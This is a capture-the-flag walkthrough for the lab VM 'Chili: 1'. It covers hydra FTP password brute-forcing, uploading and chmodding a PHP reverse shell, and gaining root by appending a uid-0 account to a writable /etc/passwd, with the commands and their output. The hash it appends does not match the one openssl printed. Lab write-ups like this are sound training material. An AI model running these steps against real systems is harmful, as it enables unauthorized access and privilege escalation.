Vulnhub - Chili: 1

Introduction

Difficulty: Easy
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

Okay then, let’s go.

nmap

All we’ve got is FTP and HTTP on port 80; nothing else. Nothing on the top 1000 UDP ports. FTP is VSFTPD 3.0.3 which is not vulnerable; same with Apache 2.4.38.

FTP

Anonymous login is not allowed. Fuzzing for subdomains turns up nothing, and gobusting turns up nothing either, even with the larger wordlists. We did get a picture of a Chili from the front page of the webserver, but the usual stego attacks get nothing (stegcracker, checking LSBs, exiftool, binwalk etc).

This box is supposed to be easy - what does that leave? Bruteforcing FTP.

root@kali:/opt/vulnhub/chili# hydra -l chili -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 192.168.1.80 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-15 11:58:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9999 login tries (l:1/p:9999), ~625 tries per task
[DATA] attacking ftp://192.168.1.80:21/
[STATUS] 289.00 tries/min, 289 tries in 00:01h, 9710 to do in 00:34h, 16 active
[21][ftp] host: 192.168.1.80   login: chili   password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-15 12:00:09

Okay, so we’re in.

After some enumeration on the box turns up nothing useful, it’s time to try putting a shell on the server and executing it. We can put with FTP, but only in one particular web directory: /var/www/html/.nano/.

We can load the shell just fine (pentest monkey, as usual), but initially it won’t fire. Why not? We need to chmod it.

ftp> chmod 775 shell.php
200 SITE CHMOD command ok.

Once that’s done, we can catch our shell and we’re on the box.

Privesc

Linpeas to the rescue; /etc/passwd is writeable. Same as sunset/twilight:

www-data@chili:/dev/shm$ openssl passwd mrcake
openssl passwd mrcake
UOdKS1eML4FfM
www-data@chili:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
<Y0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
www-data@chili:/dev/shm$ su root2
su root2
Password: mrcake

root@chili:/dev/shm# cd /root
cd /root
root@chili:~# ls -lash
ls -lash
total 32K
4.0K drwx------  3 root root 4.0K Sep  8 13:15 .
4.0K drwxr-xr-x 18 root root 4.0K Sep  7 02:47 ..
4.0K -rw-------  1 root root  126 Sep  8 13:15 .bash_history
4.0K -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Sep  8 11:43 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   47 Sep  8 12:26 proof.txt
4.0K -rw-r--r--  1 root root  176 Sep  8 11:43 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b